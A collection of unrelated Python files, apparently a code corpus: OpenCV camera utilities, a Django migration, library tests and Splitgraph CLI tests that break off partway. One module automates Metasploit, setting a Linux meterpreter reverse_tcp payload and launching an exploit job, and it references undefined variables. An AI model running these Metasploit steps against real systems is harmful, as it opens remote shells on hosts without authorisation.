cv2.putText(
im,
"% s - %.0f" % (names[prediction[0]], prediction[1]),
(x - 10, y - 10),
cv2.FONT_HERSHEY_PLAIN,
1,
(0, 255, 0),
)
else:
cv2.putText(
im,
"not recognized",
(x - 10, y - 10),
cv2.FONT_HERSHEY_PLAIN,
1,
(0, 255, 0),
)
cv2.imshow("OpenCV", im)
key = cv2.waitKey(10)
if key == 27:
break
def vid_test(args=None):
cap = cv2.VideoCapture(0)
# Check if camera opened successfully
if not cap.isOpened():
print("Error opening video file")
# Read until video is completed
while cap.isOpened():
# Capture frame-by-frame
ret, frame = cap.read()
if ret:
# Display the resulting frame
cv2.imshow("Frame", frame)
# Press Q on keyboard to exit
if cv2.waitKey(25) & 0xFF == ord("q"):
break
# Break the loop
else:
break
# When everything done, release
# the video capture object
cap.release()
# Closes all the frames
cv2.destroyAllWindows()
def list_cams(args):
"""Test the ports and returns a tuple with the available ports and the ones that are working."""
# is_working = True
dev_port = 0
working_ports = []
available_ports = []
max_ports = 20
while dev_port < max_ports:
try:
camera = cv2.VideoCapture(dev_port)
if camera.isOpened():
# is_working = False
# print("Port %s is not working." %dev_port)
# else:
is_reading, img = camera.read()
w = camera.get(3)
h = camera.get(4)
if is_reading:
print("Port %s is working and reads images (%s x %s)" % (dev_port, h, w))
working_ports.append(dev_port)
else:
print("Port %s for camera ( %s x %s) is present but does not reads." % (dev_port, h, w))
available_ports.append(dev_port)
except: # noqa: E722
a, b, c = sys.exc_info()
print(a)
print(b)
print(c)
dev_port += 1
return available_ports, working_ports
# from: https://github.com/MuonRay/Image-VideoSegmentationinNIRforPlantDetection/blob/master/NIRPlantVideoTracking.py
def NIRPlantVideoTracking(args):
cap = cv2.VideoCapture(0)
# custom colormap for ndvi greyscale video
cols3 = ["gray", "blue", "green", "yellow", "red"]
def create_colormap(args):
return LinearSegmentedColormap.from_list(name="custom1", colors=cols3)
# colour bar to match grayscale units
def create_colorbar(fig, image):
position = fig.add_axes([0.125, 0.19, 0.2, 0.05])
norm = colors.Normalize(vmin=-1.0, vmax=1.0)
cbar = plt.colorbar(
image,
cax=position,
orientation="horizontal",
norm=norm,
)
cbar.ax.tick_params(labelsize=6)
tick_locator = ticker.MaxNLocator(nbins=3)
cbar.locator = tick_locator
cbar.update_ticks()
cbar.set_label("NDVI", fontsize=10, x=0.5, y=0.5, labelpad=-25)
while 1:
# Take each frame
_, frame = cap.read()
# Convert BGR to HSV
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
# define range of red NIR vegetation color in HSV
low_red = np.array([160, 105, 84])
high_red = np.array([179, 255, 255])
# Threshold the HSV image to get only red colors
mask = cv2.inRange(hsv, low_red, high_red)
# Bitwise-AND mask and original image
res = cv2.bitwise_and(frame, frame, mask=mask)
# NDVI Processing
ir = (res[:, :, 0]).astype("float")
r = (res[:, :, 2]).astype("float")
ndvi = np.true_divide(np.subtract(ir, r), np.add(ir, r))
cols3 = ["gray", "blue", "green", "yellow", "red"]
# def create_colormap(args):
# return LinearSegmentedColormap.from_list(name="custom1", colors=cols3)
# colour bar to match grayscale units
# def create_colorbar(fig, image):
# position = fig.add_axes([0.125, 0.19, 0.2, 0.05])
# norm = colors.Normalize(vmin=-1.0, vmax=1.0)
# cbar = plt.colorbar(
# image,
# cax=position,
# orientation="horizontal",
# norm=norm,
# )
# cbar.ax.tick_params(labelsize=6)
# tick_locator = ticker.MaxNLocator(nbins=3)
# cbar.locator = tick_locator
# cbar.update_ticks()
# cbar.set_label(
# "NDVI",
# fontsize=10,
# x=0.5,
# y=0.5,
# labelpad=-25,
# )
image = plt.imshow(ndvi, cmap=create_colormap(colors))
# plt.axis('off')
# image = cv2.imshow(ndvi, cmap=create_colormap(colors))
cv2.imshow("frame", frame)
cv2.imshow("mask", mask)
cv2.imshow("res", res)
# this step adds considerable processing, be sure to use only 720p files at most a minute long
# cv2.imshow('ndvi',ndvi)
cv2.imshow("ndvi with color", ndvi)
k = cv2.waitKey(5) & 0xFF
if k == 27:
break
cv2.destroyAllWindows()
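# Note: the NDVI computed above follows the usual definition
#   NDVI = (NIR - Red) / (NIR + Red)
# with channel 0 (blue in BGR) of the masked frame used as the NIR band and channel 2
# as Red; pixels where both bands are zero produce NaN/inf values from the division.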
|
python
|
# Generated by Django 3.2.7 on 2021-09-03 10:07
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import phonenumber_field.modelfields
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Company',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200, unique=True, verbose_name='name')),
('address', models.TextField()),
('discription', models.TextField()),
('creator', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='company', to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ['name'],
},
),
migrations.CreateModel(
name='PermissionList',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('company', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='permissionlist', to='api.company')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='permissionlist', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Employee',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('lastname', models.CharField(max_length=100, verbose_name='lastname')),
('firstname', models.CharField(max_length=100, verbose_name='firstname')),
('secondname', models.CharField(max_length=100, verbose_name='secondname')),
('position', models.TextField()),
('phone_number', phonenumber_field.modelfields.PhoneNumberField(blank=True, max_length=128, region=None, unique=True)),
('office_number', phonenumber_field.modelfields.PhoneNumberField(blank=True, max_length=128, region=None)),
('fax_number', phonenumber_field.modelfields.PhoneNumberField(blank=True, max_length=128, region=None)),
('company', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='employee', to='api.company')),
],
options={
'unique_together': {('lastname', 'firstname', 'secondname', 'company')},
},
),
]
|
python
|
# -*- coding: utf-8 -*-
import pytest
from great_expectations.core import (
ExpectationConfiguration,
ExpectationValidationResult,
)
from great_expectations.render.renderer.renderer import Renderer
def test_render():
# ??? Should this really return the input object?
# Seems like raising NotImplementedError might be preferable.
assert Renderer().render({}) == {}
assert Renderer().render("wowza") == "wowza"
# TODO: Implement this test thoughtfully
# def test__id_from_configuration():
# Renderer()._id_from_configuration(expectation_type, expectation_kwargs, data_asset_name=None)
# TODO: Implement this test thoughtfully
# def test__get_expectation_type():
# Renderer()._get_expectation_type(ge_object)
# TODO: Implement this test thoughtfully
# def test__find_ge_object_type():
# Renderer()._find_ge_object_type(ge_object)
def test__find_evr_by_type(titanic_profiled_evrs_1):
    # TODO: _find_all_evrs_by_type should accept a ValidationResultSuite, not ValidationResultSuite.results
found_evr = Renderer()._find_evr_by_type(
titanic_profiled_evrs_1.results, "expect_column_to_exist"
)
print(found_evr)
assert found_evr is None
    # TODO: _find_all_evrs_by_type should accept a ValidationResultSuite, not ValidationResultSuite.results
found_evr = Renderer()._find_evr_by_type(
titanic_profiled_evrs_1.results, "expect_column_distinct_values_to_be_in_set"
)
print(found_evr)
assert found_evr == ExpectationValidationResult(
success=True,
result={
"observed_value": ["*", "1st", "2nd", "3rd"],
"element_count": 1313,
"missing_count": 0,
"missing_percent": 0.0,
"details": {
"value_counts": [
{"value": "*", "count": 1},
{"value": "1st", "count": 322},
{"value": "2nd", "count": 279},
{"value": "3rd", "count": 711},
]
},
},
exception_info={
"raised_exception": False,
"exception_message": None,
"exception_traceback": None,
},
expectation_config=ExpectationConfiguration(
expectation_type="expect_column_distinct_values_to_be_in_set",
kwargs={"column": "PClass", "value_set": None, "result_format": "SUMMARY"},
),
)
def test__find_all_evrs_by_type(titanic_profiled_evrs_1):
    # TODO: _find_all_evrs_by_type should accept a ValidationResultSuite, not ValidationResultSuite.results
found_evrs = Renderer()._find_all_evrs_by_type(
titanic_profiled_evrs_1.results, "expect_column_to_exist", column_=None
)
print(found_evrs)
assert found_evrs == []
    # TODO: _find_all_evrs_by_type should accept a ValidationResultSuite, not ValidationResultSuite.results
found_evrs = Renderer()._find_all_evrs_by_type(
titanic_profiled_evrs_1.results, "expect_column_to_exist", column_="SexCode"
)
print(found_evrs)
assert found_evrs == []
    # TODO: _find_all_evrs_by_type should accept a ValidationResultSuite, not ValidationResultSuite.results
found_evrs = Renderer()._find_all_evrs_by_type(
titanic_profiled_evrs_1.results,
"expect_column_distinct_values_to_be_in_set",
column_=None,
)
print(found_evrs)
assert len(found_evrs) == 4
    # TODO: _find_all_evrs_by_type should accept a ValidationResultSuite, not ValidationResultSuite.results
found_evrs = Renderer()._find_all_evrs_by_type(
titanic_profiled_evrs_1.results,
"expect_column_distinct_values_to_be_in_set",
column_="SexCode",
)
print(found_evrs)
assert len(found_evrs) == 1
def test__get_column_list_from_evrs(titanic_profiled_evrs_1):
column_list = Renderer()._get_column_list_from_evrs(titanic_profiled_evrs_1)
print(column_list)
assert column_list == [
"Unnamed: 0",
"Name",
"PClass",
"Age",
"Sex",
"Survived",
"SexCode",
]
|
python
|
from MyCodes.personal import title, inputInt, inputFloat
from urllib.request import urlopen
title('Exercício 113', 50, 34)
a = inputInt('Digite um valor inteiro: ')
b = inputFloat('Digite um valor real: ')
print(f'O valor inteiro é {a} e o valor real é {b:.1f}.')
title('Exercício 114', 50, 34)
try:
pag = urlopen('http://www.pudim.com.br/')
except:
print('\033[31mO site não está acessível!\033[m')
else:
print('\033[32mO site está acessível!\033[m')
|
python
|
# Copyright 2017 Gustavo Baratto. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class BaseStack(object):
""" Base class for different types of stacks.
"""
def __init__(self, **kwargs):
        for key, value in kwargs.items():
            setattr(self, key, value)
def factory(**kwargs):
""" Factory for different types of stacks
Imports are being done here so SDKs for multiple providers don't need to
be installed if never used.
"""
# default type is Cloudformation
possible_stack_type_keys = ["StackType", "stack_type", "Type", "type"]
stack_keys = kwargs.keys()
for possible_stack_type in possible_stack_type_keys:
if possible_stack_type in stack_keys:
stack_type = kwargs.pop(possible_stack_type).lower()
break
else:
stack_type = "cloudformation"
if stack_type == "cloudformation":
import gpwm.stacks.aws
return gpwm.stacks.aws.CloudformationStack(**kwargs)
elif stack_type == "azure":
import gpwm.stacks.azure
return gpwm.stacks.azure.AzureStack(**kwargs)
elif stack_type == "shell":
import gpwm.stacks.shell
return gpwm.stacks.shell.ShellStack(**kwargs)
elif stack_type == "gcp":
import gpwm.stacks.gcp
return gpwm.stacks.gcp.GCPStack(**kwargs)
raise SystemExit("Stack type not supported: {}".format(stack_type))
|
python
|
from .block import *
from .chain import *
__version__ = "0.0.1"
|
python
|
import time
from multiprocessing.pool import ThreadPool
from core.events import EventHandler
from core.keystore import KeyStore as kb
from core.packetcap import pktcap
from core.actionModule import actionModule
from core.mymsf import myMsf
from core.utils import Utils
class msfActionModule(actionModule):
seentargets = dict()
def __init__(self, config, display, lock):
actionModule.__init__(self, config, display, lock)
        # connect to msfrpc and keep the client on the instance so go()/execMsf() can use it
        self.msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']),
                         user=self.config['msfuser'], password=self.config['msfpass'])
def go(self, vector):
self.vector = vector
self.display.verbose("-> Running : " + self.getTitle())
self.display.debug("---> " + self.getDescription())
        if not self.msf.isAuthenticated():
            return
        ret = self.process()
        self.msf.cleanup()
return ret
def execMsf(self, target, cmds):
myMsf.lock.acquire()
        self.display.verbose(self.shortName + " - Connecting to " + target)
        for line in cmds['config']:
            if line == "SLEEP":
                self.msf.sleep(int(self.config['msfexploitdelay']))
            else:
                self.msf.execute(line + "\n")
if cmds['payload'] == "none":
pass
elif cmds['payload'] == "win":
pass
elif cmds['payload'] == "linux":
msf.execute("set PAYLOAD linux/x86/meterpreter/reverse_tcp")
msf.execute("set LPORT 4445")
msf.execute("exploit -j\n")
msf.sleep(int(self.config['msfexploitdelay']))
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
result = msf.getResult()
#while (re.search(".*execution completed.*", result) is None):
# result = result + msf.getResult()
myMsf.lock.release()
Utils.writeFile(result, outfile)
        return result, outfile
|
python
|
# A tuple has no .replace() method; use a list and swap the matching element instead.
names = ['emir', 'zarina', 'baizak', 'nazira']
names[names.index('emir')] = 'vanya'
print(names)
|
python
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import pytest
pytest.importorskip("ethosu.vela")
import tvm.contrib.ethosu.cascader as pl
from tvm.contrib.ethosu.cascader.parts import EthosuPart
def test_ethosu_part():
te_subgraph = pl.TESubgraph([], None)
output_quantum = [1, 2, 2, 8]
quantum_cycles = 32
propagator = pl.Propagator(
[[1, 0, 0, 0, 2], [0, 1, 0, 0, 2], [0, 0, 1, 0, 0], [0, 0, 0, 1, 0], [0, 0, 0, 0, 1]],
[0, 0, 0, 0],
)
stripe_config = pl.StripeConfig(
[1, 4, 4, 16], [1, 64, 72, 96], [1, 4, 4, 16], [1, 2, 3, 4], [1, 16, 13, 6], [0, 0, 0, 0]
)
part = EthosuPart(te_subgraph, [propagator], output_quantum, quantum_cycles)
assert part.get_stripe_align_hint() == output_quantum
# Check that the performance model runs, don't verify output
part.get_performance_info(stripe_config, False)
part.get_performance_info(stripe_config, True)
if __name__ == "__main__":
pytest.main([__file__])
|
python
|
import os
import tempfile
from pathlib import Path
from test.splitgraph.commands.test_commit_diff import _alter_diff_splitting_dataset
from test.splitgraph.conftest import API_RESOURCES, OUTPUT
from unittest import mock
from unittest.mock import call, patch, sentinel
import httpretty
import pytest
from click import ClickException
from click.testing import CliRunner
from splitgraph.commandline import (
cli,
config_c,
dump_c,
eval_c,
import_c,
prune_c,
rm_c,
upstream_c,
)
from splitgraph.commandline.common import ImageType, RepositoryType
from splitgraph.commandline.example import alter_c, generate_c, splitfile_c
from splitgraph.commandline.misc import (
_get_binary_url_for,
_get_download_paths,
_get_system_id,
upgrade_c,
)
from splitgraph.config import PG_PWD, PG_USER
from splitgraph.core.engine import repository_exists
from splitgraph.core.fragment_manager import FragmentManager
from splitgraph.core.repository import Repository
from splitgraph.engine import ResultShape
from splitgraph.exceptions import (
ImageNotFoundError,
RepositoryNotFoundError,
TableNotFoundError,
)
def test_image_spec_parsing():
assert ImageType()("test/pg_mount") == (Repository("test", "pg_mount"), "latest")
assert ImageType(default="HEAD")("test/pg_mount") == (Repository("test", "pg_mount"), "HEAD")
assert ImageType()("test/pg_mount:some_tag") == (Repository("test", "pg_mount"), "some_tag")
assert ImageType()("pg_mount") == (Repository("", "pg_mount"), "latest")
assert ImageType()("pg_mount:some_tag") == (Repository("", "pg_mount"), "some_tag")
assert ImageType(default="HEAD")("pg_mount:some_tag") == (
Repository("", "pg_mount"),
"some_tag",
)
def test_image_repo_parsing_errors(pg_repo_local):
repo = Repository("test", "pg_mount")
assert ImageType(get_image=True, default="latest")("test/pg_mount")[1] == repo.images["latest"]
assert (
ImageType(get_image=True, default="latest")("test/pg_mount:00000000")[1]
== repo.images["00000000"]
)
with pytest.raises(ImageNotFoundError):
ImageType(get_image=True, default="latest")("test/pg_mount:doesnt_exist")
with pytest.raises(RepositoryNotFoundError):
ImageType(get_image=True, default="latest")("test/doesntexist:latest")
with pytest.raises(RepositoryNotFoundError):
RepositoryType(exists=True)("test/doesntexist")
def test_upstream_management(pg_repo_local):
runner = CliRunner()
# sgr upstream test/pg_mount
result = runner.invoke(upstream_c, ["test/pg_mount"])
assert result.exit_code == 0
assert "has no upstream" in result.output
# Set to nonexistent engine
result = runner.invoke(upstream_c, ["test/pg_mount", "--set", "dummy_engine", "test/pg_mount"])
assert result.exit_code == 1
assert "Remote engine 'dummy_engine' does not exist" in result.output
# Set to existing engine (should we check the repo actually exists?)
result = runner.invoke(upstream_c, ["test/pg_mount", "--set", "remote_engine", "test/pg_mount"])
assert result.exit_code == 0
assert "set to track remote_engine:test/pg_mount" in result.output
# Get upstream again
result = runner.invoke(upstream_c, ["test/pg_mount"])
assert result.exit_code == 0
assert "is tracking remote_engine:test/pg_mount" in result.output
# Reset it
result = runner.invoke(upstream_c, ["test/pg_mount", "--reset"])
assert result.exit_code == 0
assert "Deleted upstream for test/pg_mount" in result.output
assert pg_repo_local.upstream is None
# Reset it again
result = runner.invoke(upstream_c, ["test/pg_mount", "--reset"])
assert result.exit_code == 1
assert "has no upstream" in result.output
@pytest.mark.mounting
def test_import(pg_repo_local, mg_repo_local):
runner = CliRunner()
head = pg_repo_local.head
# sgr import mountpoint, table, target_mountpoint (3-arg)
result = runner.invoke(import_c, [str(mg_repo_local), "stuff", str(pg_repo_local)])
assert result.exit_code == 0
new_head = pg_repo_local.head
assert new_head.get_table("stuff")
with pytest.raises(TableNotFoundError):
head.get_table("stuff")
# sgr import with alias
result = runner.invoke(
import_c, [str(mg_repo_local), "stuff", str(pg_repo_local), "stuff_copy"]
)
assert result.exit_code == 0
new_new_head = pg_repo_local.head
assert new_new_head.get_table("stuff_copy")
with pytest.raises(TableNotFoundError):
new_head.get_table("stuff_copy")
# sgr import with alias and custom image hash
mg_repo_local.run_sql("DELETE FROM stuff")
new_mg_head = mg_repo_local.commit()
result = runner.invoke(
import_c,
[
str(mg_repo_local) + ":" + new_mg_head.image_hash,
"stuff",
str(pg_repo_local),
"stuff_empty",
],
)
assert result.exit_code == 0
new_new_new_head = pg_repo_local.head
assert new_new_new_head.get_table("stuff_empty")
with pytest.raises(TableNotFoundError):
new_new_head.get_table("stuff_empty")
assert pg_repo_local.run_sql("SELECT * FROM stuff_empty") == []
# sgr import with query, no alias
result = runner.invoke(
import_c,
[
str(mg_repo_local) + ":" + new_mg_head.image_hash,
"SELECT * FROM stuff",
str(pg_repo_local),
],
)
assert result.exit_code != 0
assert "TARGET_TABLE is required" in str(result.stdout)
def test_rm_repositories(pg_repo_local, pg_repo_remote):
runner = CliRunner()
# sgr rm test/pg_mount, say "no"
result = runner.invoke(rm_c, [str(pg_repo_local)], input="n\n")
assert result.exit_code == 1
assert "Repository test/pg_mount will be deleted" in result.output
assert repository_exists(pg_repo_local)
# sgr rm test/pg_mount, say "yes"
result = runner.invoke(rm_c, [str(pg_repo_local)], input="y\n")
assert result.exit_code == 0
assert not repository_exists(pg_repo_local)
# sgr rm test/pg_mount -r remote_engine
result = runner.invoke(rm_c, [str(pg_repo_remote), "-r", "remote_engine"], input="y\n")
assert result.exit_code == 0
assert not repository_exists(pg_repo_remote)
def test_rm_images(pg_repo_local_multitag, pg_repo_remote_multitag):
# Play around with both engines for simplicity -- both have 2 images with 2 tags
runner = CliRunner()
local_v1 = pg_repo_local_multitag.images["v1"].image_hash
local_v2 = pg_repo_local_multitag.images["v2"].image_hash
# Test deleting checked out image causes an error
result = runner.invoke(rm_c, [str(pg_repo_local_multitag) + ":v2"])
assert result.exit_code != 0
assert "do sgr checkout -u test/pg_mount" in str(result.exc_info)
pg_repo_local_multitag.uncheckout()
# sgr rm test/pg_mount:v2, say "no"
result = runner.invoke(rm_c, [str(pg_repo_local_multitag) + ":v2"], input="n\n")
assert result.exit_code == 1
# Specify most of the output verbatim here to make sure it's not proposing
# to delete more than needed (just the single image and the single v2 tag)
assert (
"Images to be deleted:\n" + local_v2 + "\nTotal: 1\n\nTags to be deleted:\nv2\nTotal: 1"
in result.output
)
# Since we cancelled the operation, 'v2' still remains.
assert pg_repo_local_multitag.images["v2"].image_hash == local_v2
assert pg_repo_local_multitag.images[local_v2] is not None
# Uncheckout the remote too (it's supposed to be bare anyway)
remote_v2 = pg_repo_remote_multitag.images["v2"].image_hash
pg_repo_remote_multitag.uncheckout()
# sgr rm test/pg_mount:v2 -r remote_engine, say "yes"
result = runner.invoke(
rm_c, [str(pg_repo_remote_multitag) + ":v2", "-r", "remote_engine"], input="y\n"
)
assert result.exit_code == 0
assert pg_repo_remote_multitag.images.by_tag("v2", raise_on_none=False) is None
with pytest.raises(ImageNotFoundError):
pg_repo_remote_multitag.images.by_hash(remote_v2)
# sgr rm test/pg_mount:v1 -y
# Should delete both images since v2 depends on v1
result = runner.invoke(rm_c, [str(pg_repo_local_multitag) + ":v1", "-y"])
assert result.exit_code == 0
assert local_v2 in result.output
assert local_v1 in result.output
assert "v1" in result.output
assert "v2" in result.output
# One image remaining (the 00000.. base image)
assert len(pg_repo_local_multitag.images()) == 1
def test_prune(pg_repo_local_multitag, pg_repo_remote_multitag):
runner = CliRunner()
# Two engines, two repos, two images in each (tagged v1 and v2, v1 is the parent of v2).
pg_repo_remote_multitag.uncheckout()
# sgr prune test/pg_mount -- all images are tagged, nothing to do.
result = runner.invoke(prune_c, [str(pg_repo_local_multitag)])
assert result.exit_code == 0
assert "Nothing to do" in result.output
# Delete tag v2 and run sgr prune -r remote_engine test/pg_mount, say "no": the image
# that used to be 'v2' now isn't tagged so it will be a candidate for removal (but not the v1 image).
remote_v2 = pg_repo_remote_multitag.images["v2"]
remote_v2.delete_tag("v2")
pg_repo_remote_multitag.commit_engines()
result = runner.invoke(
prune_c, [str(pg_repo_remote_multitag), "-r", "remote_engine"], input="n\n"
)
assert result.exit_code == 1 # Because "n" aborted the command
assert remote_v2.image_hash in result.output
assert "Total: 1" in result.output
# Make sure the image still exists
assert pg_repo_remote_multitag.images.by_hash(remote_v2.image_hash)
# Delete tag v1 and run sgr prune -r remote_engine -y test_pg_mount:
# now both images aren't tagged so will get removed.
remote_v1 = pg_repo_remote_multitag.images["v1"]
remote_v1.delete_tag("v1")
pg_repo_remote_multitag.commit_engines()
result = runner.invoke(prune_c, [str(pg_repo_remote_multitag), "-r", "remote_engine", "-y"])
assert result.exit_code == 0
assert remote_v2.image_hash in result.output
assert remote_v1.image_hash in result.output
# 2 images + the 000... image
assert "Total: 3" in result.output
assert not pg_repo_remote_multitag.images()
# Finally, delete both tags from the local engine and prune. Since there's still
# a HEAD tag pointing to the ex-v2, nothing will actually happen.
result = runner.invoke(prune_c, [str(pg_repo_local_multitag), "-y"])
assert "Nothing to do." in result.output
# 2 images + the 000.. image
assert len(pg_repo_local_multitag.images()) == 3
assert len(pg_repo_local_multitag.get_all_hashes_tags()) == 3
def test_config_dumping():
runner = CliRunner()
# sgr config (normal, with passwords shielded)
result = runner.invoke(config_c, catch_exceptions=False)
assert result.exit_code == 0
assert PG_PWD not in result.output
assert "remote_engine:" in result.output
assert ("SG_ENGINE_USER=%s" % PG_USER) in result.output
assert "DUMMY=test.splitgraph.splitfile" in result.output
assert "S3=splitgraph.hooks.s3" in result.output
# sgr config -s (no password shielding)
result = runner.invoke(config_c, ["-s"])
assert result.exit_code == 0
assert ("SG_ENGINE_USER=%s" % PG_USER) in result.output
assert ("SG_ENGINE_PWD=%s" % PG_PWD) in result.output
assert "remote_engine:" in result.output
# sgr config -sc (no password shielding, output in config format)
result = runner.invoke(config_c, ["-sc"])
assert result.exit_code == 0
assert ("SG_ENGINE_USER=%s" % PG_USER) in result.output
assert ("SG_ENGINE_PWD=%s" % PG_PWD) in result.output
assert "[remote: remote_engine]" in result.output
assert "[defaults]" in result.output
assert "[commands]" in result.output
assert "[external_handlers]" in result.output
assert "[data_sources]" in result.output
assert "S3=splitgraph.hooks.s3" in result.output
# sgr config -n (print connection string to engine)
result = runner.invoke(config_c, ["-n"])
assert result.output == "postgresql://sgr:supersecure@localhost:5432/splitgraph\n"
def test_examples(local_engine_empty):
# Test the example-generating commands used in the quickstart
runner = CliRunner()
result = runner.invoke(generate_c, ["example/repo_1"])
assert result.exit_code == 0
repo = Repository.from_schema("example/repo_1")
assert len(repo.images()) == 2
assert repo.run_sql("SELECT COUNT(*) FROM demo", return_shape=ResultShape.ONE_ONE) == 10
assert repo.diff("demo", repo.head, None, aggregate=True) == (0, 0, 0)
result = runner.invoke(alter_c, ["example/repo_1"])
assert result.exit_code == 0
assert len(repo.images()) == 2
assert repo.diff("demo", repo.head, None, aggregate=True) == (2, 2, 2)
result = runner.invoke(splitfile_c, ["example/repo_1", "example/repo_2"])
assert result.exit_code == 0
assert "FROM example/repo_1 IMPORT demo AS table_1" in result.stdout
assert "FROM example/repo_2:${IMAGE_2} IMPORT demo AS table_2" in result.stdout
def test_commandline_dump_load(pg_repo_local):
pg_repo_local.run_sql("ALTER TABLE fruits ADD PRIMARY KEY (fruit_id)")
pg_repo_local.commit()
pg_repo_local.run_sql("INSERT INTO fruits VALUES (3, 'mayonnaise')")
pg_repo_local.commit()
pg_repo_local.run_sql("UPDATE fruits SET name = 'banana' WHERE fruit_id = 1")
pg_repo_local.commit()
pg_repo_local.head.tag("test_tag")
runner = CliRunner()
result = runner.invoke(dump_c, [str(pg_repo_local)], catch_exceptions=False)
assert result.exit_code == 0
dump = result.stdout
# Now delete the repo and try loading the dump to test it actually works.
pg_repo_local.delete()
pg_repo_local.objects.cleanup()
pg_repo_local.engine.run_sql(dump)
pg_repo_local.images["test_tag"].checkout()
assert pg_repo_local.run_sql("SELECT * FROM fruits ORDER BY fruit_id") == [
(1, "banana"),
(2, "orange"),
(3, "mayonnaise"),
]
def test_commandline_eval():
runner = CliRunner()
result = runner.invoke(eval_c, ["print()"], input="n\n", catch_exceptions=False)
assert result.exit_code == 1
assert "Aborted!" in result.output
result = runner.invoke(
eval_c,
[
"assert Repository.from_schema('test/repo').namespace == 'test';"
"assert object_manager is not None; print('arg_1=%s' % arg_1)",
"--arg",
"arg_1",
"val_1",
"--i-know-what-im-doing",
],
catch_exceptions=False,
)
assert result.exit_code == 0
assert "arg_1=val_1" in result.output
_GH_TAG = "https://api.github.com/repos/splitgraph/splitgraph/releases/tags/v0.1.0"
_GH_LATEST = "https://api.github.com/repos/splitgraph/splitgraph/releases/latest"
_GH_NONEXISTENT = "https://api.github.com/repos/splitgraph/splitgraph/releases/tags/vnonexistent"
def _gh_response(request, uri, response_headers):
with open(os.path.join(API_RESOURCES, "github_releases.json")) as f:
return [200, response_headers, f.read()]
def _gh_404(request, uri, response_headers):
return [404, response_headers, ""]
@httpretty.activate(allow_net_connect=False)
@pytest.mark.parametrize(
("system", "release", "result"),
[
(
"linux",
"latest",
(
"0.1.0",
"https://github.com/splitgraph/splitgraph/releases/download/v0.1.0/sgr-linux-x86_64",
),
),
(
"linux",
"v0.1.0",
(
"0.1.0",
"https://github.com/splitgraph/splitgraph/releases/download/v0.1.0/sgr-linux-x86_64",
),
),
(
"osx",
"latest",
(
"0.1.0",
"https://github.com/splitgraph/splitgraph/releases/download/v0.1.0/sgr-osx-x86_64",
),
),
(
"windows",
"latest",
(
"0.1.0",
"https://github.com/splitgraph/splitgraph/releases/download/v0.1.0/sgr-windows-x86_64.exe",
),
),
("windows", "vnonexistent", ValueError),
("weirdplatform", "v0.1.0", ValueError),
],
)
def test_get_binary_url(system, release, result):
httpretty.register_uri(httpretty.HTTPretty.GET, _GH_TAG, body=_gh_response)
httpretty.register_uri(httpretty.HTTPretty.GET, _GH_LATEST, body=_gh_response)
httpretty.register_uri(httpretty.HTTPretty.GET, _GH_NONEXISTENT, body=_gh_404)
if result == ValueError:
with pytest.raises(result):
_get_binary_url_for(system, release)
else:
assert _get_binary_url_for(system, release) == result
def test_system_id_not_exists():
with mock.patch("splitgraph.commandline.misc.platform.system", return_value="TempleOS"):
with pytest.raises(ClickException):
_get_system_id()
@pytest.mark.parametrize(
("path", "final_path"),
[
("/home/user/", "/home/user/sgr"),
("/home/user/sgr_dest", "/home/user/sgr_dest"),
(None, "/usr/local/bin/sgr"),
],
)
def test_get_download_paths(fs_fast, path, final_path):
Path("/home/user/").mkdir(parents=True)
with mock.patch("splitgraph.commandline.misc.sys") as m_sys:
m_sys.executable = "/usr/local/bin/sgr"
temp_path_actual, final_path_actual = _get_download_paths(
path, "https://some.url.com/assets/sgr"
)
assert str(final_path_actual) == final_path
@httpretty.activate(allow_net_connect=False)
def test_upgrade_end_to_end():
_BODY = "new sgr client"
httpretty.register_uri(httpretty.HTTPretty.GET, _GH_TAG, body=_gh_response)
httpretty.register_uri(httpretty.HTTPretty.GET, _GH_LATEST, body=_gh_response)
httpretty.register_uri(httpretty.HTTPretty.GET, _GH_NONEXISTENT, body=_gh_404)
httpretty.register_uri(
httpretty.HTTPretty.GET,
"https://github.com/splitgraph/splitgraph/releases/download/v0.1.0/sgr-linux-x86_64",
body=_BODY,
adding_headers={"Content-Length": len(_BODY)},
)
runner = CliRunner()
# Patch a lot of things
with tempfile.TemporaryDirectory() as dir:
with open(os.path.join(dir, "sgr"), "w") as f:
f.write("old sgr client")
_module = "splitgraph.commandline.misc"
with mock.patch(_module + ".sys") as m_sys:
m_sys.executable = os.path.join(dir, "sgr")
m_sys.frozen = True
with mock.patch(_module + ".platform.system", return_value="Linux"):
with mock.patch(_module + ".subprocess.check_call") as subprocess:
with mock.patch(_module + ".list_engines", return_value=[sentinel.engine]):
with mock.patch("splitgraph.commandline.misc.atexit.register") as register:
